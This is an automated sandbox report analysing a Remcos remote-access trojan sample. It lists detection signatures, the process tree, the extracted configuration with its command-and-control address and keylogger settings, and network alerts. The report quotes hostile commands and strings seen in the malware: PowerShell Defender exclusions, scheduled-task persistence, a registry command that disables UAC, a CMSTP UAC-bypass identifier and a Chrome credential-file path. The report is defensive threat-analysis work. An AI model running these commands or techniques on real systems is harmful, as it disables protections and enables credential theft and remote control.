Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HUED23EDE5UGRFQ.exe

Overview

General Information

Sample name:HUED23EDE5UGRFQ.exe
Analysis ID:1465543
MD5:ea0d00b95a91c801893b5526347170bb
SHA1:26d81494eb3c0fd67a6037dbd68e3bf8c7677d0d
SHA256:6b585caaf4299c406c45a3beb76a8624d159404e1aac48a292976119c6d9b72c
Tags:exeRATRemcosRAT
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • HUED23EDE5UGRFQ.exe (PID: 2820 cmdline: "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe" MD5: EA0D00B95A91C801893B5526347170BB)
    • powershell.exe (PID: 1292 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 4948 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 2544 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jdSldfVS.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 1048 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • HUED23EDE5UGRFQ.exe (PID: 4896 cmdline: "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe" MD5: EA0D00B95A91C801893B5526347170BB)
  • jdSldfVS.exe (PID: 6124 cmdline: C:\Users\user\AppData\Roaming\jdSldfVS.exe MD5: EA0D00B95A91C801893B5526347170BB)
    • schtasks.exe (PID: 3248 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 1808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jdSldfVS.exe (PID: 3580 cmdline: "C:\Users\user\AppData\Roaming\jdSldfVS.exe" MD5: EA0D00B95A91C801893B5526347170BB)
    • jdSldfVS.exe (PID: 4092 cmdline: "C:\Users\user\AppData\Roaming\jdSldfVS.exe" MD5: EA0D00B95A91C801893B5526347170BB)
    • jdSldfVS.exe (PID: 6996 cmdline: "C:\Users\user\AppData\Roaming\jdSldfVS.exe" MD5: EA0D00B95A91C801893B5526347170BB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "94.156.69.93:2973:0", "Assigned name": "REVOLT", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HKC0PV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000009.00000002.4580750131.0000000002B6F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000011.00000002.2185308624.0000000000BDA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              Click to see the 20 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              17.2.jdSldfVS.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                17.2.jdSldfVS.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                  17.2.jdSldfVS.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                  • 0x6c4a8:$a1: Remcos restarted by watchdog!
                  • 0x6ca20:$a3: %02i:%02i:%02i:%03i
                  17.2.jdSldfVS.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                  • 0x664fc:$str_a1: C:\Windows\System32\cmd.exe
                  • 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                  • 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                  • 0x6656c:$str_b2: Executing file:
                  • 0x675ec:$str_b3: GetDirectListeningPort
                  • 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                  • 0x67118:$str_b7: \update.vbs
                  • 0x66594:$str_b9: Downloaded file:
                  • 0x66580:$str_b10: Downloading file:
                  • 0x66624:$str_b12: Failed to upload file:
                  • 0x675b4:$str_b13: StartForward
                  • 0x675d4:$str_b14: StopForward
                  • 0x67070:$str_b15: fso.DeleteFile "
                  • 0x67004:$str_b16: On Error Resume Next
                  • 0x670a0:$str_b17: fso.DeleteFolder "
                  • 0x66614:$str_b18: Uploaded file:
                  • 0x665d4:$str_b19: Unable to delete:
                  • 0x67038:$str_b20: while fso.FileExists("
                  • 0x66ab1:$str_c0: [Firefox StoredLogins not found]
                  17.2.jdSldfVS.exe.400000.0.raw.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
                  • 0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • 0x6637c:$s1: CoGetObject
                  • 0x66390:$s1: CoGetObject
                  • 0x663ac:$s1: CoGetObject
                  • 0x70338:$s1: CoGetObject
                  • 0x6633c:$s2: Elevation:Administrator!new:
                  Click to see the 41 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", ParentImage: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe, ParentProcessId: 2820, ParentProcessName: HUED23EDE5UGRFQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", ProcessId: 1292, ProcessName: powershell.exe
                  Sigma detected: Powershell Defender Exclusion
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", ParentImage: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe, ParentProcessId: 2820, ParentProcessName: HUED23EDE5UGRFQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", ProcessId: 1292, ProcessName: powershell.exe
                  Sigma detected: Suspicious Add Scheduled Task Parent
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\jdSldfVS.exe, ParentImage: C:\Users\user\AppData\Roaming\jdSldfVS.exe, ParentProcessId: 6124, ParentProcessName: jdSldfVS.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpBFB2.tmp", ProcessId: 3248, ProcessName: schtasks.exe
                  Sigma detected: Suspicious Schtasks From Env Var Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", ParentImage: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe, ParentProcessId: 2820, ParentProcessName: HUED23EDE5UGRFQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp", ProcessId: 1048, ProcessName: schtasks.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", ParentImage: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe, ParentProcessId: 2820, ParentProcessName: HUED23EDE5UGRFQ.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", ProcessId: 1292, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Scheduled temp file as task from temp location
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe", ParentImage: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe, ParentProcessId: 2820, ParentProcessName: HUED23EDE5UGRFQ.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jdSldfVS" /XML "C:\Users\user\AppData\Local\Temp\tmpAF95.tmp", ProcessId: 1048, ProcessName: schtasks.exe

                  Stealing of Sensitive Information

                  barindex
                  Sigma detected: Remcos
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exe, ProcessId: 4896, TargetFilename: C:\ProgramData\remcos\logs.dat

                  Snort Signatures

                  Timestamp:07/01/24-19:44:18.352759
                  SID:2032777
                  Source Port:2973
                  Destination Port:49712
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/01/24-19:41:59.286996
                  SID:2032776
                  Source Port:49712
                  Destination Port:2973
                  Protocol:TCP
                  Classtype:A Network Trojan was detected

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus / Scanner detection for submitted sample
                  Source: HUED23EDE5UGRFQ.exeAvira: detected
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeAvira: detection malicious, Label: HEUR/AGEN.1308776
                  Found malware configuration
                  Source: 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "94.156.69.93:2973:0", "Assigned name": "REVOLT", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-HKC0PV", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeReversingLabs: Detection: 31%
                  Multi AV Scanner detection for submitted file
                  Source: HUED23EDE5UGRFQ.exeReversingLabs: Detection: 31%
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 17.2.jdSldfVS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42782c0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.jdSldfVS.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42f0ce0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42f0ce0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42782c0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.4580750131.0000000002B6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2185308624.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 2820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 4896, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jdSldfVS.exe PID: 6124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jdSldfVS.exe PID: 6996, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: HUED23EDE5UGRFQ.exeJoe Sandbox ML: detected
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,17_2_00433837
                  Source: HUED23EDE5UGRFQ.exe, 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_82b18925-a

                  Exploits

                  barindex
                  Yara detected UAC Bypass using CMSTP
                  Source: Yara matchFile source: 17.2.jdSldfVS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42782c0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.jdSldfVS.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42f0ce0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42f0ce0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42782c0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 2820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jdSldfVS.exe PID: 6124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jdSldfVS.exe PID: 6996, type: MEMORYSTR

                  Privilege Escalation

                  barindex
                  Contains functionality to bypass UAC (CMSTPLUA)
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_004074FD _wcslen,CoGetObject,17_2_004074FD
                  Source: HUED23EDE5UGRFQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: HUED23EDE5UGRFQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409253
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,17_2_0041C291
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,17_2_0040C34D
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,17_2_00409665
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0044E879 FindFirstFileExA,17_2_0044E879
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,17_2_0040880C
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040783C FindFirstFileW,FindNextFileW,17_2_0040783C
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,17_2_00419AF5
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,17_2_0040BB30
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,17_2_0040BD37
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,17_2_00407C97
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 4x nop then jmp 07AB431Fh10_2_07AB3C21
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 4x nop then jmp 07AB431Fh10_2_07AB3CFA

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2032776 ET TROJAN Remcos 3.x Unencrypted Checkin 192.168.2.6:49712 -> 94.156.69.93:2973
                  Source: TrafficSnort IDS: 2032777 ET TROJAN Remcos 3.x Unencrypted Server Response 94.156.69.93:2973 -> 192.168.2.6:49712
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 94.156.69.93
                  Source: global trafficTCP traffic: 192.168.2.6:49712 -> 94.156.69.93:2973
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
                  Source: Joe Sandbox ViewASN Name: TERASYST-ASBG TERASYST-ASBG
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.69.93
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.69.93
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.69.93
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.69.93
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.69.93
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.69.93
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.69.93
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.69.93
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.69.93
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.69.93
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.69.93
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.69.93
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.69.93
                  Source: unknownTCP traffic detected without corresponding DNS query: 94.156.69.93
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
